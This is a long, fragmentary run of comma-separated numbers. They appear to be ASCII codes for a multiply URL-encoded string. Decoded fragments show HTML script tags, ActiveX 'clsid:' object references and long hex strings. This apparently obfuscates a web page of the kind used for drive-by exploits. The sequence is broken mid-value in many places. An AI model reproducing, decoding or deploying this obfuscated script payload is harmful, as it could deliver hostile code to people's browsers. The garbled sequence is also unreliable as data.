3,55,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,51,50,37,50,53,50,67,54,4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4,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,54,49,37,50,53,50,67,52,55,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,52,55,37,50,53,50,67,49,49,48,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,52,56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4,37,50,53,50,67,54,53,37,50,53,50,67,56,57,37,50,53,50,67,54,57,37,50,53,50,67,56,50,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55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7,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,54,37,50,53,50,67,54,53,37,50,53,50,67,56,57,37,50,53,50,67,54,57,37,50,53,50,67,56,50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6,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,53,37,50,53,50,67,51,50,37,50,53,50,67,49,50,51,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,52,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49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1,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,53,37,50,53,50,67,55,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,55,54,37,50,53,50,67,55,51,37,50,53,50,67,54,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,4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1,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,57,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,54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0,37,50,53,50,67,54,57,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,54,50,37,50,53,50,67,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54,49,37,50,53,50,67,51,52,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,52,53,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,56,48,37,50,53,50,67,54,57,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,52,55,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,54,49,37,50,53,50,67,56,53,37,50,53,50,67,56,52,37,50,53,50,67,55,48,37,50,53,50,67,52,53,37,50,53,50,67,53,53,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,50,37,50,53,50,67,54,57,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,54,50,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,49,49,57,37,50,53,50,67,52,53,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,53,50,37,50,53,50,67,52,53,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,49,49,57,37,50,53,50,67,52,53,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,53,50,37,50,53,50,67,52,53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7,55,37,50,53,50,67,51,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50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1,53,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,55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9,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,50,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48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6,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,54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6,37,50,53,50,67,49,50,51,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,49,50,53,37,50,53,50,67,53,5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6,37,50,53,50,67,49,50,51,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,50,53,37,50,53,50,67,53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7,55,37,50,53,50,67,51,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,52,56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49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,51,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,56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7,37,50,53,50,67,54,54,37,50,53,50,67,55,52,37,50,53,50,67,54,57,37,50,53,50,67,54,55,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,56,37,50,53,50,67,52,54,37,50,53,50,67,52,54,37,50,53,50,67,52,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,49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2,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50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3,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,50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1,37,50,53,50,67,57,49,37,50,53,50,67,54,55,37,50,53,50,67,54,56,37,50,53,50,67,54,53,37,50,53,50,67,56,52,37,50,53,50,67,54,53,37,50,53,50,67,57,49,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,57,51,37,50,53,50,67,57,51,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,50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1,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52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50,48,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,56,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,54,50,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,57,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,57,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,50,48,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56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48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,56,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,48,5